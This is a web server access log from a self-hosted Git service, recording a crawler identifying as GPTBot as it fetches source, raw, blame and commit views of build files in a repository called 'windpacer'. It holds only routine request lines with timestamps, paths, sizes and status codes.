"/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:01:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build" +[17/Feb/2026:15:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16896] [Gzip 10.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:01:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10220] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:01:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:01:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 9915] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:15:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51206] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:01:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 129724] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:15:01:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:01:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 80642] [Gzip 29.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/Analysis-00.toc" +[17/Feb/2026:15:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 40959] [Gzip 14.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" +[17/Feb/2026:15:01:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:01:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51176] [Gzip 26.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/TestApp" +[17/Feb/2026:15:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:15:01:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs" [Client 74.7.227.38] [Length 10375] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:15:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16184] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build" +[17/Feb/2026:15:01:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:15:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10775] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build" +[17/Feb/2026:15:01:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/base_library.zip" [Client 74.7.227.38] [Length 10899] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" +[17/Feb/2026:15:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/Makefile" +[17/Feb/2026:15:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 40492] [Gzip 14.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" +[17/Feb/2026:15:02:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/PYZ-00.toc" +[17/Feb/2026:15:02:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles" +[17/Feb/2026:15:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/Analysis-00.toc" [Client 74.7.227.38] [Length 59725] [Gzip 16.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" +[17/Feb/2026:15:02:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/Makefile" +[17/Feb/2026:15:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10948] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:15:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10947] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:15:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10948] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs" +[17/Feb/2026:15:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11827] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11276] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29812] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11194] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14297] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14640] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11101] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9940] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73577] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10078] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9959] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16049] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11026] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12011] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9939] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 